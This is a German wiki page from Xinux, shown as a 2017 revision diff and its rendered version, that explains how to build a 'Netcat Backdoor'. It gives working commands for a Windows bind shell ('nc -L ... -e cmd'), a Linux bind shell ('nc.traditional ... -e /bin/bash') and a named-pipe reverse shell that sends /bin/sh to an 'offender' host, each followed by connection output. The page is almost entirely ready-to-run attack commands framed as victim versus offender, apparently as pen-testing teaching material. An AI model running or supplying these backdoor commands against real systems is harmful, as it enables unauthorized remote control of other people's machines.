Netcat Backdoor: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 13: Zeile 13:
  
 
=Linux=
 
=Linux=
==without netcat-openbsd==
+
==with netcat-traditional==
 +
*root@victim:~# nc.traditional -l -p 10001  -e /bin/bash
 +
*root@offender:~# netcat 10.1.1.1 10001
 +
==with netcat-openbsd==
 
VICTIM=10.1.1.1
 
VICTIM=10.1.1.1
 
OFFENDER=10.1.1.2
 
OFFENDER=10.1.1.2
Zeile 22: Zeile 25:
 
  listening on [any] 8668 ...
 
  listening on [any] 8668 ...
 
  connect to [10.1.1.2] from (UNKNOWN) [10.1.1.1] 54154
 
  connect to [10.1.1.2] from (UNKNOWN) [10.1.1.1] 54154
==with netcat-traditional==
 
*root@victim:~# nc.traditional -l -p 10001  -e /bin/bash
 
*root@offender:~# netcat 10.1.1.1 10001
 
 
=Links=
 
=Links=
 
*https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem
 
*https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem

Version vom 13. November 2017, 21:39 Uhr

Windows

Download

Victim

  • C:\Users\admin\Downloads>nc -L -p 10011 -d -e cmd

Offender

MSVICTIM=10.1.1.4

  • oesx:~ thomas$ nc $MSVICTIM 10011
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. Alle Rechte vorbehalten.

C:\Users\admin\Downloads>

Linux

with netcat-traditional

  • root@victim:~# nc.traditional -l -p 10001 -e /bin/bash
  • root@offender:~# netcat 10.1.1.1 10001

with netcat-openbsd

VICTIM=10.1.1.1 OFFENDER=10.1.1.2

  • root@offender:~# nc -nvlp 8668
  • root@victim:~# mknod /tmp/backpipe
  • root@victim:~# /bin/sh 0</tmp/backpipe | nc $OFFENDER 8668 1>/tmp/backpipe
  • root@offender:~# nc -nvlp 8668
listening on [any] 8668 ...
connect to [10.1.1.2] from (UNKNOWN) [10.1.1.1] 54154

Links